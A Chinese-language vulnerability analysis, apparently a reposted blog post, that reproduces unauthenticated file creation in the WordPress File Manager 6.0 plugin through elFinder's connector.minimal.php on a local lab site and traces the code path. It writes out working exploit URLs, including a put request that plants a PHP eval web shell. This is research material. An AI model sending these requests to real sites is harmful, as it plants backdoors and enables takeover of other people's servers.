Wordpress 插件命令执行

admin 2021年4月15日01:04:26Wordpress 插件命令执行已关闭评论69 views字数 2106阅读7分1秒阅读模式

环境搭建

利用 phpstudy 搭建 wordpresshttp://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。

File Manager插件6.0版本

漏洞利用

这段代码来自 elFinder 项目,这是一个向 Web 应用程序提供文件浏览器 GUI 的框架。这个非常具体的代码仅作为示例,而不能在生产应用程序中直接使用。但是,正如我们所看到的,使用了它,结果是可以执行这部分代码而无需进行身份验证。

exp-db 搜索 elFinder

Wordpress 插件命令执行

下载下来的漏洞利用文件需要修改部分

Wordpress 插件命令执行

Wordpress 插件命令执行

漏洞分析

发送一个这样的 payload 来进行创建文件的操作 http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=test.php&target=l1_Lw

漏洞触发位置 /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

通过创建 elFinderConnector 对象,进而调用 elFinderConnector.run

Wordpress 插件命令执行

读取所有的请求参数保存到 $src 中, $cmd 获取 cmd 变量。
\elFinderConnector::run

Wordpress 插件命令执行

接着执行到循环 foreach ($this->elFinder->commandArgsList($cmd) as $name => $req) {$cmd 进行校验

Wordpress 插件命令执行

跟进函数commandArgsList

\elFinder::commandArgsList

Wordpress 插件命令执行

\elFinder::commandExists

Wordpress 插件命令执行

通过判断 $cmd ,在 \$this->commands[\$cmd] 中发现了可以调用的方法

\elFinder::$commands

Wordpress 插件命令执行

继续执行,发现 $this->output($this->elFinder->exec($cmd, $args));

Wordpress 插件命令执行

\elFinder::exec

控制 $cmd = makedile 时, 为满足条件继续向下执行,需要传入 $target 或者 $dst

Wordpress 插件命令执行

$this->volume($dst) 根据传入的 $dst 前缀进行选择 l1_ 或者 t1_ 我们在后面进行调试时会发现生成文件的位置前缀为所对应的 root 的值 ,所以我们在这里选择 l1_

\elFinder::volume

Wordpress 插件命令执行

Wordpress 插件命令执行

Wordpress 插件命令执行

继续执行到动态调用,通过 $result = $this->$cmd($args); 调用makefile方法。

\elFinderVolumeDriver::mkfile

Wordpress 插件命令执行

$path = $this->decode($dst);

\elFinderVolumeDriver::decode

Wordpress 插件命令执行
decode 函数 先将$hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root

返回$path = E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files

继续回到 mkfile 函数中执行

Wordpress 插件命令执行

\elFinderVolumeLocalFileSystem::_mkfile

Wordpress 插件命令执行

Wordpress 插件命令执行

最后顺利生成文件在 E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php

对于网站的位置就是 \wp-content\plugins\wp-file-manager\lib\files\test.php

Wordpress 插件命令执行

然后再调用 PUT 方法,传值到 mkfile 生成的文件内。

http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=put&target=l1_dGVzdC5waHA=&content=<?php eval($_GET['cmd']);?>

Wordpress 插件命令执行

前一部分不在详述,直接跟到 $result = $this->$cmd($args); 调用 put 方法

\elFinder::put

Wordpress 插件命令执行

\elFinderVolumeDriver::putContents

Wordpress 插件命令执行

\elFinderVolumeDriver::decode

Wordpress 插件命令执行
decode 函数 先将$hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root 最后会返回 $path 的值为E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php
\elFinderVolumeLocalFileSystem::_filePutContents

Wordpress 插件命令执行

成功将字符串写入文件中


成功利用还可以直接利用 upload 方法,上传文件

Wordpress 插件命令执行

Wordpress 插件命令执行

\elFinder::upload

Wordpress 插件命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月15日01:04:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wordpress 插件命令执行https://cn-sec.com/archives/246729.html